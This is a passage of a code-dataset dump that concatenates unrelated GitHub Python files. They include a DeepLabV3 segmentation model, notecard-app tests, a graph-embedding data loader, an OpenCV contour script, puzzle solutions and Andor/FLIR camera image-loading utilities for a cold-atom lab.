self.act(y)\n y = self.conv(y)\n y = self.bn2(y)\n y = self.act(y)\n y = self.point_conv2(y)\n y = self.bn3(y)\n\n if self.branch_conv:\n y_ = self.point_conv_(x)\n y_ = self.bn_(y_)\n y = y + y_\n\n else:\n y = y + x\n\n y = self.act(y)\n return y\n\nclass ResNet_block(nn.Module):\n def __init__(self,input_c,output_c,duplicate,stride=1,dilation=1):\n super().__init__()\n\n self.list = nn.ModuleList()\n self.list.append(ResNet_bottleneck(input_c,output_c//4,output_c,stride,dilation))\n\n for i in range(duplicate - 1):\n self.list.append(ResNet_bottleneck(output_c,output_c//4,output_c,1,dilation))\n\n def forward(self,x):\n for module in self.list:\n x = module(x)\n return x\n\nclass ResNet50(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.conv1 = ResNet_Head(True)\n self.conv2 = ResNet_block(64,256,3,2)\n self.conv3 = ResNet_block(256,512,4,2)\n self.conv4 = ResNet_block(512,1024,6,2)\n self.conv5 = ResNet_block(1024,2048,3,1)\n self.avgpool = nn.AdaptiveAvgPool2d((1,1))\n\n self.flatten = nn.Flatten()\n self.fc = nn.Linear(2048,1000)\n\n def forward(self,x):\n print(0,x.shape)\n y = self.conv1(x)\n print(1,y.shape)\n y = self.conv2(y)\n print(2,y.shape)\n y = self.conv3(y)\n print(3,y.shape)\n y = self.conv4(y)\n print(4,y.shape)\n y = self.conv5(y)\n print(5,y.shape)\n y = self.avgpool(y)\n y = self.flatten(y)\n y = self.fc(y)\n return y\n\n\n# backbone = ResNet50()\n# conv1:4\n# conv2:8\n# conv3:16\n# conv4:32\n# conv5:32\n\n\nclass ResNet50_FCN(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.conv1 = ResNet_Head(True)\n self.conv2 = ResNet_block(64,256,3,2)\n self.conv3 = ResNet_block(256,512,4,1)\n self.conv4 = ResNet_block(512,1024,6,1,2)\n self.conv5 = ResNet_block(1024,2048,3,1,4)\n\n def forward(self,x):\n # print(0,x.shape)\n y = self.conv1(x)\n # print(1,y.shape)\n y = self.conv2(y)\n # print(2,y.shape)\n y = self.conv3(y)\n # print(3,y.shape)\n y = self.conv4(y)\n # print(4,y.shape)\n y = self.conv5(y)\n # print(5,y.shape)\n\n return y\n\n\nclass ASPP(nn.Module):\n def __init__(self,input_c=2048,middle_c=512,num_classes=10,scale=60,primal=480,dropout=0.3):\n super(ASPP,self).__init__()\n\n self.image_pool = nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n nn.Conv2d(input_c,middle_c,kernel_size=1,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True),\n nn.Upsample((scale,scale),mode='bilinear')\n )\n\n self.conv1 = nn.Sequential(\n nn.Conv2d(input_c,middle_c,kernel_size=1,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True)\n )\n \n self.dilated_conv2 = nn.Sequential(\n nn.Conv2d(input_c,middle_c,kernel_size=3,padding=6,dilation=6,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True)\n )\n\n self.dilated_conv3 = nn.Sequential(\n nn.Conv2d(input_c,middle_c,kernel_size=3,padding=12,dilation=12,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True)\n )\n\n self.dilated_conv4 = nn.Sequential(\n nn.Conv2d(input_c,middle_c,kernel_size=3,padding=18,dilation=18,bias=False),\n nn.Dropout2d(p=dropout),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True)\n )\n\n self.output = nn.Sequential(\n nn.Conv2d(5*middle_c,middle_c,kernel_size=3,padding=1,bias=False),\n nn.BatchNorm2d(middle_c),\n nn.ReLU(inplace=True),\n nn.Dropout2d(p=dropout),\n nn.Conv2d(middle_c,num_classes,kernel_size=1,bias=False),\n nn.Upsample((primal,primal),mode='bilinear')\n )\n\n def forward(self, x):\n\n y1 = self.conv1(x)\n y2 = self.dilated_conv2(x)\n y3 = self.dilated_conv3(x)\n y4 = self.dilated_conv4(x)\n y5 = self.image_pool(x)\n\n y = torch.cat([y1,y2,y3,y4,y5],dim=1)\n\n y = self.output(y)\n # print(y.shape)\n\n return y\n\n\nclass DeepLabv3(nn.Module):\n def __init__(self):\n super().__init__()\n \n self.backbone = ResNet50_FCN()\n self.ASPP = ASPP(num_classes=1,scale=28,primal=224)\n \n def forward(self,x):\n y = self.backbone(x)\n y = self.ASPP(y)\n\n return y\n\nif __name__ == '__main__':\n model = DeepLabv3()\n model(torch.ones((2,3,480,480)))\n\n","repo_name":"xmttttt/DeepLabV3","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16757119934","text":"\"\"\"\ntesting of the config.py script\n\"\"\"\nfrom rNotecards.config import Config\nfrom rNotecards.constants import PROJECT_ROOT_DIR\nfrom rNotecards.main import RNotecardApp, RNotecard\nimport shutil\nimport pandas as pd\nimport os\nimport time\nimport gc\n\n\ndef test__load_excel_data():\n file_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'test__notecards_data.xlsx')\n backup_file_path = file_path.split('.xlsx')[0] + '_backup.xlsx'\n test_app = RNotecardApp(file_path, backup_file_path)\n\n expected_keys = ['deck01', 'deck02']\n actual_keys = list(test_app.rnotecard_sets_dict.keys())\n assert actual_keys == expected_keys, f\"Keys do not match. Expected {expected_keys}, but got {actual_keys}\"\n\n # Assumed test data\n expected_data = {\n 'deck01': [\n {'front': 'this is the first entered card from deck01', 'back': 'a'},\n {'front': 'this is the second entered card from deck01', 'back': 'b'},\n {'front': 'this is the third entered card from deck01', 'back': 'c'}\n ],\n 'deck02': [\n {'front': 'this is the first entered card from deck02', 'back': 'a'},\n {'front': 'this is the second entered card from deck02', 'back': 'b'},\n {'front': 'this is the third entered card from deck02', 'back': 'c'},\n {'front': 'this is the fourth entered card from deck02', 'back': 'd'}\n ]\n # add more decks if needed\n }\n\n for key, rnotecard_set in test_app.rnotecard_sets_dict.items():\n # Check the id field\n assert rnotecard_set.id == key, f\"For key {key}, expected id {key} but got {rnotecard_set.id}\"\n\n # Check the notecards list\n expected_notecards = expected_data[key]\n actual_notecards = [notecard.data for notecard in rnotecard_set.notecards]\n\n assert \\\n actual_notecards == expected_notecards, \\\n f\"For key {key}, expected notecards {expected_notecards} but got {actual_notecards}\"\n\n\ndef test__save_to_excel():\n # Step 1: Create a copy of the original Excel file for testing\n original_excel_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'test__notecards_data.xlsx')\n temp_excel_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'temp_test__notecards_data.xlsx')\n backup_temp_excel_file_path = temp_excel_path.split('.xlsx')[0] + '_backup.xlsx'\n shutil.copyfile(original_excel_path, temp_excel_path)\n\n # Step 2: Load the Excel file into an RNotecardApp object\n test_app = RNotecardApp(temp_excel_path, backup_temp_excel_file_path)\n\n # Step 3: Make some changes to the notecards\n new_card = RNotecard({'front': 'new front', 'back': 'new back'})\n test_app.rnotecard_sets_dict['deck01'].notecards.append(new_card)\n\n # Step 4: Call the save_to_excel method\n test_app.save_to_excel()\n\n del test_app\n gc.collect()\n # Step 5: Reload the Excel file and verify changes\n with pd.ExcelFile(temp_excel_path) as xls: # Using 'with' ensures the file is closed after use\n df = pd.read_excel(xls, 'RN__deck01', engine='openpyxl')\n df.columns = map(str.lower, df.columns)\n\n # Verify that the new card has been added\n assert (\"new front\", \"new back\") in zip(df['front'], df['back']), \"New card was not saved to Excel\"\n\n # Clean up: Remove the temporary Excel file\n os.remove(temp_excel_path)\n\n\ndef test__rnotecard():\n original_excel_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'test__notecards_data__02.xlsx')\n temp_excel_path = str(PROJECT_ROOT_DIR / 'tests' / 'data' / 'temp_test__notecards_data__02.xlsx')\n backup_temp_excel_file_path = temp_excel_path.split('.xlsx')[0] + '_backup.xlsx'\n shutil.copyfile(original_excel_path, temp_excel_path)\n\n # Step 2: Load the Excel file into an RNotecardApp object\n test_app = RNotecardApp(temp_excel_path, backup_temp_excel_file_path)\n test_app.rnotecard_sets_dict['interview_quests'].notecards[0].calculate_total_perf_score()\n assert test_app.rnotecard_sets_dict['interview_quests'].notecards[0].data.get('total_perf_score') == -2.875\n\n del test_app\n gc.collect()\n os.remove(temp_excel_path)\n","repo_name":"ropreso/rNotecards","sub_path":"tests/test__main.py","file_name":"test__main.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20224201631","text":"import numpy\nimport random\nfrom random import shuffle\nfrom numpy import array\nfrom Embedder import Embedder\nimport torch\nimport torch.optim as optim\nimport time\nimport pickle\n\n\nclass NodeInputData:\n\n def __init__(self, batch_size=30):\n\n with open('data.pickle', 'rb') as in_file:\n [self.graph, self.id2name, self.name2id, self.stance_start, self.stance_end, self.issue_start, self.issue_end, self.ad_start, self.ad_end,\\\n self.funding_entity_start, self.funding_entity_end, self.issue_unigram_start, self.issue_unigram_end, self.personal_unigram_start,\\\n self.personal_unigram_end, self.policy_unigram_start, self.policy_unigram_end, self.indicator_label_start, self.indicator_label_end, \\\n self.annotated_ads, self.annotated_funding_entities, self.ad2tokenized_text, self.weights_matrix, self.id2text, self.entity_indicators, \\\n self.left_entity_indicators, self.right_entity_indicators, self.ad2annotated_stance, self.ad2annotated_issue,\\\n self.ad2personal_policy_annotation]=pickle.load(in_file, encoding=\"bytes\")\n\n self.all_stances=set([i for i in range(self.stance_start, self.stance_end+1)])\n self.all_issues=set([i for i in range(self.issue_start, self.issue_end+1)])\n self.all_ads=set([i for i in range(self.ad_start, self.ad_end+1)])\n self.all_funding_entities=set([i for i in range(self.funding_entity_start, self.funding_entity_end+1)])\n self.all_issue_unigrams=set([i for i in range(self.issue_unigram_start, self.issue_unigram_end+1)])\n self.all_personal_unigrams=set([i for i in range(self.personal_unigram_start, self.personal_unigram_end+1)])\n self.all_policy_unigrams=set([i for i in range(self.policy_unigram_start, self.policy_unigram_end+1)])\n self.all_indicator_labels=set([i for i in range(self.indicator_label_start, self.indicator_label_end+1)])\n \n\n\n self.ad2stance_adj_pos={}\n self.ad2funding_entity_adj_pos={}\n self.ad2personal_unigram_adj_pos={}\n self.ad2policy_unigram_adj_pos={}\n self.ad2issue_unigram_adj_pos={}\n self.funding_entity2stance_adj_pos={}\n self.issue_unigram2issue_adj_pos={}\n self.issue2indicator_label_adj_pos={}\n self.personal_unigram2indicator_label_adj_pos={}\n self.policy_unigram2indicator_label_adj_pos={}\n\n self.ad2stance_adj_neg = {}\n self.ad2funding_entity_adj_neg = {}\n self.ad2personal_unigram_adj_neg = {}\n self.ad2policy_unigram_adj_neg = {}\n self.ad2issue_unigram_adj_neg = {}\n self.funding_entity2stance_adj_neg = {}\n self.issue_unigram2issue_adj_neg = {}\n self.issue2indicator_label_adj_neg = {}\n self.personal_unigram2indicator_label_adj_neg = {}\n self.policy_unigram2indicator_label_adj_neg = {}\n\n self.all_nodes_to_train=None\n\n self.batch_size=batch_size\n\n\n def get_nodes(self, training_graph):\n\n #print (len(training_graph))\n \n for ad in self.all_ads:\n adjacency_list=training_graph[ad]\n\n if len(adjacency_list & self.all_stances)>0:\n self.ad2stance_adj_pos[ad]=adjacency_list & self.all_stances\n self.ad2stance_adj_neg[ad] = self.all_stances - self.ad2stance_adj_pos[ad]\n if len(adjacency_list & self.all_funding_entities)>0:\n self.ad2funding_entity_adj_pos[ad]=adjacency_list & self.all_funding_entities\n self.ad2funding_entity_adj_neg[ad] = self.all_funding_entities - self.ad2funding_entity_adj_pos[ad]\n if len(adjacency_list & self.all_personal_unigrams)>0:\n self.ad2personal_unigram_adj_pos[ad]=adjacency_list & self.all_personal_unigrams\n self.ad2personal_unigram_adj_neg[ad] = self.all_personal_unigrams - self.ad2personal_unigram_adj_pos[ad]\n if len(adjacency_list & self.all_policy_unigrams)>0:\n self.ad2policy_unigram_adj_pos[ad]=adjacency_list & self.all_policy_unigrams\n self.ad2policy_unigram_adj_neg[ad] = self.all_policy_unigrams - self.ad2policy_unigram_adj_pos[ad]\n if len(adjacency_list & self.all_issue_unigrams)>0:\n self.ad2issue_unigram_adj_pos[ad]=adjacency_list & self.all_issue_unigrams\n self.ad2issue_unigram_adj_neg[ad] = self.all_issue_unigrams - self.ad2issue_unigram_adj_pos[ad]\n\n for funding_entity in self.all_funding_entities:\n adjacency_list=training_graph[funding_entity]\n\n if len(adjacency_list & self.all_stances)>0:\n self.funding_entity2stance_adj_pos[funding_entity]=adjacency_list & self.all_stances\n self.funding_entity2stance_adj_neg[funding_entity] = self.all_stances - self.funding_entity2stance_adj_pos[funding_entity]\n\n for iu in self.all_issue_unigrams:\n \n adjacency_list = training_graph[iu]\n #print (adjacency_list)\n \n if len(adjacency_list & self.all_issues) > 0:\n self.issue_unigram2issue_adj_pos[iu] = adjacency_list & self.all_issues\n self.issue_unigram2issue_adj_neg[iu] = self.all_issues - self.issue_unigram2issue_adj_pos[iu]\n\n for pu in self.all_personal_unigrams:\n adjacency_list = training_graph[pu]\n\n if len(adjacency_list & self.all_indicator_labels) > 0:\n self.personal_unigram2indicator_label_adj_pos[pu] = adjacency_list & self.all_indicator_labels\n self.personal_unigram2indicator_label_adj_neg[pu] = self.all_indicator_labels - self.personal_unigram2indicator_label_adj_pos[pu] - set([self.name2id['$issue']])\n\n for pu in self.all_policy_unigrams:\n adjacency_list = training_graph[pu]\n\n if len(adjacency_list & self.all_indicator_labels) > 0:\n self.policy_unigram2indicator_label_adj_pos[pu] = adjacency_list & self.all_indicator_labels\n self.policy_unigram2indicator_label_adj_neg[pu] = self.all_indicator_labels - self.policy_unigram2indicator_label_adj_pos[pu] - set([self.name2id['$issue']])\n\n for issue in self.all_issues:\n adjacency_list = training_graph[issue]\n\n if len(adjacency_list & self.all_indicator_labels) > 0:\n self.issue2indicator_label_adj_pos[issue] = adjacency_list & self.all_indicator_labels\n self.issue2indicator_label_adj_neg[issue] = self.all_indicator_labels - self.issue2indicator_label_adj_pos[issue]\n\n\n \n \n self.all_nodes_to_train=[i for i in training_graph]\n\n batches=[]\n \n discarded_nodes=0\n shuffle(self.all_nodes_to_train)\n \n #print (len(self.all_nodes_to_train))\n j=0\n while j 0):\n convexHull = cv2.convexHull(contour)\n cv2.drawContours(image=img, contours=[convexHull], contourIdx=-1, color=(0, 0, 255), thickness=2, lineType=cv2.LINE_AA)\n\n tmp+=1\n \n\n\n# Affichage de l'image\ncv2.imshow('gamma', gamma)\ncv2.imshow('Binaire', eroded)\ncv2.imshow('Contours', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Thomas-aub/Licence-3","sub_path":"projet-analyse/analyse/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23506577411","text":"import numpy as np\r\n\r\nndigits = 16 # Half of\r\nncounts = 500\r\n\r\npowers = np.ndarray((11,), dtype=\"uint64\")\r\nspowers = \"\"\r\nfor n in range(2, 11):\r\n\tpowers[n] = n ** ndigits + 1\r\n\tspowers += \" \" + str(powers[n])\r\n\r\ndef num2strby2(n, length):\r\n\tres = \"\"\r\n\twhile n > 0:\r\n\t\tres = str(n % 2) + res\r\n\t\tn = n // 2\r\n\treturn res.zfill(length)\r\n\r\nwith open(\"c-large.txt\", \"w\") as f:\r\n\tf.write('Case #1:\\n' + '\\n'.join(['1' + num2strby2(ntry, ndigits - 2) + '11' + num2strby2(ntry, ndigits - 2) + '1' + spowers for ntry in range(ncounts)]))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/2180.py","file_name":"2180.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42620442229","text":"#!/bin/python3\nimport sys\ndef beautifulDays(i, j, k):\n # Complete this function\n li=[]\n for i in range(i,j+1):\n #print(i)\n a=i\n res=0\n while(a>0):\n rem=a%10\n res=rem+res*10\n a=a//10\n #print(i)\n #print(res)\n whole=abs(i-res)%k\n #print(whole)\n if(whole==0):\n li.append(i)\n return len(li)\ni, j, k = input().strip().split(' ')\ni, j, k = [int(i), int(j), int(k)]\nresult = beautifulDays(i, j, k)\nprint(result)\n","repo_name":"bhaskarkalahasthi/pythonprograms","sub_path":"Beautiful Days at the Movies algoritm in hacker rank.py","file_name":"Beautiful Days at the Movies algoritm in hacker rank.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29251206849","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 5 17:40:14 2022\r\n\r\n@author: Sommer Lab\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np \r\nimport matplotlib.patches as patches\r\nimport lmfit\r\nfrom lmfit import Parameters\r\nimport configparser \r\n\r\nclass AndorZyla: # Andor Zyla 5.5 \r\n def __init__(self):\r\n self.quantum_eff = .62 #Andor Zyla \r\n self.sensitivity = .45\r\n \r\nclass FLIRchameleon: #FLIR Chameleon3 CM3-U3-13S2M \r\n def __init__(self):\r\n self.quantum_eff = .50 \r\n self.sensitivity = .45 # numbers need to be updated \r\n \r\nclass ExperimentParams:\r\n def __init__(self, config, picturesPerIteration=1):\r\n \"\"\" \r\n Parameters\r\n ----------\r\n config : TYPE\r\n DESCRIPTION.\r\n picturesPerIteration : TYPE, optional\r\n picturesPerIteration : int\r\n How many pictures does Cicero take in each iteration? (typically 2 or 3) The default is 1.\r\n \"\"\"\r\n #input parameters from config file\r\n self.config = config\r\n self.picturesPerIteration = picturesPerIteration\r\n self.number_of_pics = int(config['Acquisition']['NumberinKineticSeries'])\r\n assert self.number_of_pics % picturesPerIteration == 0, \"Number of pictures should be a multiple of picturesPerIteration\" # checks for error\r\n self.number_of_iterations = int(self.number_of_pics / picturesPerIteration)\r\n \r\n self.height1 = int(config['FullImage']['VerticalEnd']) - int(config['FullImage']['VerticalStart']) + 1\r\n self.width1 = int(config['FullImage']['HorizontalEnd']) - int(config['FullImage']['HorizontalStart']) + 1 \r\n self.bin_horizontal = int(config['FullImage']['HorizontalBin'])\r\n self.bin_vertical = int(config['FullImage']['VerticalBin'])\r\n \r\n # image height, width and range after binning\r\n self.height = int(self.height1/self.bin_vertical)\r\n self.width = int(self.width1/self.bin_horizontal)\r\n self.xmin=int(0) #origin placed at zero by python\r\n self.ymin=int(0) #origin placed at zero by python\r\n self.xmax=self.width-1\r\n self.ymax=self.height-1 \r\n self.number_of_pixels = self.height*self.width\r\n \r\n self.data_type = np.int16\r\n self.ready_to_save = 'true'\r\n\r\n self.camera=AndorZyla()\r\n \r\n P_MOT_beam = 14e-3 #power per MOT beam, roughly 1/4 of what goes into octopus\r\n self.pixel_size = 1/(22.2e3) #obtained from measurement of magnification using ambient light\r\n r_beam = .01 #meters\r\n I1 = 2*P_MOT_beam/(np.pi*r_beam**2)\r\n I = 6*I1\r\n Isat = 25 #W/m^2\r\n self.s = I/Isat\r\n self.gamma = 36.898e6\r\n self.delta = 26e6*2*np.pi\r\n self.R_scat = self.gamma*.5*self.s/(1+self.s+(2*self.delta/self.gamma)**2)\r\n self.t_exp = float(config['Acquisition']['ExposureTime']) \r\n aperture_radius = 6.73/2 #in mm, the radius of the iris placed at the lens directly after the chamber where the MOT starts to get blocked\r\n cos_theta = 150/np.sqrt(aperture_radius**2+150**2)\r\n self.solid_angle = 2*np.pi*(1-cos_theta)\r\n\r\ndef LoadConfigFile(dataFolder=\".\", configFileName='config.cfg'): \r\n config_file = dataFolder + \"//\" + configFileName\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n return config\r\n \r\ndef LoadTOF(dataFolder='.', TOF_filename='TOF_list.txt', units_of_tof='ms'): \r\n tof_list = np.loadtxt(dataFolder + \"//\" + TOF_filename)\r\n return tof_list, units_of_tof \r\n \r\n\r\ndef loadPGM(filename):\r\n \r\n with open(filename, 'r') as f:\r\n filetype = f.readline()\r\n if filetype.strip() != \"P2\":\r\n raise Exception(\"wrong format, should be P2\")\r\n return\r\n \r\n res = f.readline().split()\r\n cols = int(res[0])\r\n rows = int(res[1])\r\n pixel_number = rows*cols\r\n \r\n maxval = f.readline()\r\n \r\n datastrings = f.read().split()\r\n data = [x for x in map(int, datastrings)]\r\n rows2discard = 2\r\n data = data[(cols*rows2discard):] # discard the first two rows\r\n rows = rows-rows2discard\r\n data_array = np.array(data)\r\n data_array = np.reshape(data_array, (rows,cols))\r\n \r\n return data_array \r\n \r\n\r\n# to load a numbered series of FLIR .pgm images into a 4D numpy array\r\n# filenames must be in this format: root + number.pgm. Numers must start from 1 \r\ndef loadSeriesPGM(params, root_filename, number_of_pics=1, picturesPerIteration=1 , n_params=0, data_folder= \".\" , background_file_name=\"\"):\r\n# n_params is the number of embedded image information fields which are checked, values between 0 to 10, default 0 \r\n# zero is black, maxval is white\r\n# maxval that our files show is 65536 because of the 2 byte packets but the ADC is 12 bit so\r\n# i think in practice pixel values are between 0 and 4096 \r\n# the standard binary .pgm file starts with string P5 \\n width space height \\n 65535 \\n\r\n\r\n# read the background image into a 1d numpy array whose size is pixel_nimber\r\n# width and height of the background images should be the same as the series of images \r\n number_of_iterations = int(number_of_pics/picturesPerIteration)\r\n\r\n filename = data_folder + \"\\\\\" + root_filename + str(1)+ \".pgm\" \r\n first_image = loadPGM(filename) \r\n rows,cols = np.shape(first_image)\r\n \r\n pixel_number = rows*cols\r\n \r\n if background_file_name:\r\n bg_filename = data_folder + \"\\\\\" + background_file_name \r\n bg_data_array = loadPGM(bg_filename)\r\n else:\r\n bg_data_array = np.zeros((rows,cols), first_image.dtype)\r\n \r\n \r\n image_array = np.zeros((number_of_iterations, picturesPerIteration, rows, cols))\r\n\r\n for iteration in range(number_of_iterations):\r\n for picture in range(picturesPerIteration):\r\n x = iteration*picturesPerIteration + picture\r\n filename = data_folder + \"\\\\\" + root_filename + str(x+1)+ \".pgm\" \r\n data_array_corrected = loadPGM(filename) - bg_data_array\r\n image_array[iteration, picture,:,:] = data_array_corrected\r\n \r\n return image_array\r\n \r\n \r\n \r\n \r\n # with open(bg_filename, 'r') as f:\r\n # filetype = f.readline()\r\n # if filetype.strip() != \"P2\":\r\n # raise Exception(\"wrong format, should be P2\")\r\n # return\r\n \r\n # bg_res = f.readline().split()\r\n # bg_cols = int(bg_res[0])\r\n # bg_rows = int(bg_res[1])\r\n # bg_pixel_number = bg_rows*bg_cols\r\n \r\n # bg_maxval = f.readline()\r\n \r\n # bg_datastrings = f.read().split()\r\n # bg_data = [x for x in map(int, bg_datastrings)]\r\n \r\n # rows2discard = bg_rows-rows\r\n # bg_data = bg_data[(cols*rows2discard):] # discard the first rows2discard rows\r\n # bg_data_array = np.array(bg_data)\r\n \r\n \r\n \r\n # bg_data_array = np.array(bg_data)\r\n\r\n\r\n# read all images in the series into a 1D numpy array whose length is number_of_pics*pixel_number\r\n# also background correct all images\r\n \r\n # with open(filename, 'r') as f:\r\n # filetype = f.readline()\r\n # if filetype.strip() != \"P2\":\r\n # raise Exception(\"wrong format, should be P2\")\r\n # return\r\n \r\n # res = f.readline().split()\r\n # cols = int(res[0])\r\n # if bg_cols != cols: \r\n # raise Exception(\"background image doesnt have same number of columns as data\")\r\n # rows = int(res[1])\r\n # if bg_rows != rows:\r\n # raise Exception(\"background doesnt have same number of rows as data\")\r\n # pixel_number = rows*cols\r\n # if bg_pixel_number != pixel_number:\r\n # raise Exception(\"background doesnt have same pixel number as data\")\r\n # print(\"Resolution is: Columns=\",cols,\" and Rows=\", rows, \".\")\r\n # print(\"Total number of pixels =\", pixel_number)\r\n \r\n # maxval = f.readline()\r\n \r\n # datastrings = f.read().split()\r\n # data = [x for x in map(int, datastrings)]\r\n # #data = data[(cols*2)-1:] # discard the first two rows\r\n # f.close()\r\n \r\n # data_array = np.array(data) # convert into a numpy array \r\n \r\n #data_array_corrected = data_array - bg_data_array # all images are background corrected\r\n\r\n # print(\"frame #\", x+1 , \"max value before background subtraction = \"+str(np.max(data_array)))\r\n # print(\"frame #\", x+1 , \"min value before background subtraction = \"+str(np.min(data_array)))\r\n # print(\"frame #\", x+1 , \"max value after background subtraction = \"+str(np.max(data_array_corrected)))\r\n # print(\"frame #\", x+1 , \"min value after background subtraction = \"+str(np.min(data_array_corrected)))\r\n\r\n # # uppend the image to the larger 1D numpy array that contains all the images back to back and in order \r\n # image_array[x*pixel_number: (x+1)*pixel_number] = data_array\r\n # image_array_corrected[x*pixel_number: (x+1)*pixel_number] = data_array_corrected\r\n\r\n # images = np.reshape(image_array_corrected,(number_of_iterations, picturesPerIteration, rows, cols))\r\n # return images \r\n \r\n # reshape the total_image_array_corrected into a 4D array\r\n # outermost dimension's size is equal to the number of iterations, \r\n # 2nd outer dimensions size is number of pictures per iteration\r\n # 3rd dimensions size is equal to the height of the images \r\n\r\n# to load a series of non-spooled Andor .dat images into a 4D numpy array\r\ndef LoadSeries(params, root_filename, data_folder= \".\" , background_file_name= \"background.dat\"):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n params : ExperimentParams object\r\n Contains config, number_of_pixels, and other parameters \r\n data_folder : string\r\n path to the folder with the spooled series data, and the background image\r\n background_file_name : string\r\n name of background image, assumed to be in the data_folder\r\n \r\n Returns\r\n -------\r\n 4D array of integers giving the background-subtracted camera counts in each pixel.\r\n Format: images[iterationNumber, pictureNumber, row, col]\r\n \r\n \"\"\"\r\n background_array = np.zeros(params.number_of_pixels)\r\n #Load background image into background_array\r\n if background_file_name:\r\n background_img = data_folder + \"//\" + background_file_name\r\n file=open(background_img,\"rb\")\r\n content=file.read()\r\n background_array = np.frombuffer(content, dtype=params.data_type)\r\n background_array = background_array[0:params.number_of_pixels]\r\n file.close()\r\n\r\n #read the whole kinetic series, bg correct, and load all images into a numpy array called image-array_correcpted\r\n image_array = np.zeros(shape = (1, params.number_of_pixels * params.number_of_pics))[0] \r\n image_array_corrected = np.zeros(shape = (1, params.number_of_pixels * params.number_of_pics))[0]\r\n for x in range(params.number_of_pics): \r\n filename = data_folder + \"\\\\\" + root_filename + str(x+1)+ \".dat\" \r\n file = open(filename,\"rb\")\r\n content = file.read()\r\n data_array = np.frombuffer(content, dtype=params.data_type)\r\n data_array = data_array[0:params.number_of_pixels]\r\n data_array_corrected = data_array - background_array \r\n image_array[x*params.number_of_pixels: (x+1)*params.number_of_pixels] = data_array\r\n print(\"max value before background subtraction = \"+str(np.max(image_array)))\r\n image_array_corrected[x*params.number_of_pixels: (x+1)*params.number_of_pixels] = data_array_corrected\r\n #print(\"max value after background subtraction = \"+str(np.max(image_array_corrected)))\r\n \r\n # reshape the total_image_array_corrected into a 4D array\r\n # outermost dimension's size is equal to the number of iterations, \r\n # 2nd outer dimensions size is number of pictures per iteration\r\n # 3rd dimensions size is equal to the height of the images\r\n #print(params.number_of_iterations, params.picturesPerIteration, params.height, params.width)\r\n images = np.reshape(image_array_corrected,(params.number_of_iterations, params.picturesPerIteration, params.height, params.width))\r\n return images\r\n\r\ndef LoadSpooledSeries(params, data_folder= \".\" , background_file_name= \"spool_background.dat\"):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n params : ExperimentParams object\r\n Contains config, number_of_pixels, and other parameters \r\n data_folder : string\r\n path to the folder with the spooled series data, and the background image\r\n background_file_name : string\r\n name of background image, assumed to be in the data_folder\r\n \r\n Returns\r\n -------\r\n 4D array of integers giving the background-subtracted camera counts in each pixel.\r\n Format: images[iterationNumber, pictureNumber, row, col]\r\n \r\n \"\"\"\r\n background_array = np.zeros(params.number_of_pixels)\r\n #Load background image into background_array\r\n if background_file_name:\r\n background_img = data_folder + \"//\" + background_file_name\r\n file=open(background_img,\"rb\")\r\n content=file.read()\r\n background_array = np.frombuffer(content, dtype=params.data_type)\r\n background_array = background_array[0:params.number_of_pixels]\r\n file.close()\r\n\r\n #read the whole kinetic series, bg correct, and load all images into a numpy array called image-array_correcpted\r\n image_array = np.zeros(shape = (1, params.number_of_pixels * params.number_of_pics))[0] \r\n image_array_corrected = np.zeros(shape = (1, params.number_of_pixels * params.number_of_pics))[0]\r\n spool_number = '0000000000'\r\n for x in range(params.number_of_pics): \r\n filename = data_folder + \"\\\\\"+ str(x)[::-1] + spool_number[0:(10-len(str(x)))]+\"spool.dat\" \r\n file = open(filename,\"rb\")\r\n content = file.read()\r\n data_array = np.frombuffer(content, dtype=params.data_type)\r\n data_array = data_array[0:params.number_of_pixels] # a spool file that is not bg corrected\r\n data_array_corrected = data_array - background_array #spool file that is background corrected\r\n image_array[x*params.number_of_pixels: (x+1)*params.number_of_pixels] = data_array\r\n print(\"max value before background subtraction = \"+str(np.max(image_array)))\r\n image_array_corrected[x*params.number_of_pixels: (x+1)*params.number_of_pixels] = data_array_corrected\r\n #print(\"max value after background subtraction = \"+str(np.max(image_array_corrected)))\r\n \r\n # reshape the total_image_array_corrected into a 4D array\r\n # outermost dimension's size is equal to the number of iterations, \r\n # 2nd outer dimensions size is number of pictures per iteration\r\n # 3rd dimensions size is equal to the height of the images\r\n #print(params.number_of_iterations, params.picturesPerIteration, params.height, params.width)\r\n images = np.reshape(image_array_corrected,(params.number_of_iterations, params.picturesPerIteration, params.height, params.width))\r\n return images\r\n\r\ndef CountsToAtoms(params, counts):\r\n \"\"\"\r\n Convert counts to atom number for fluorescence images\r\n 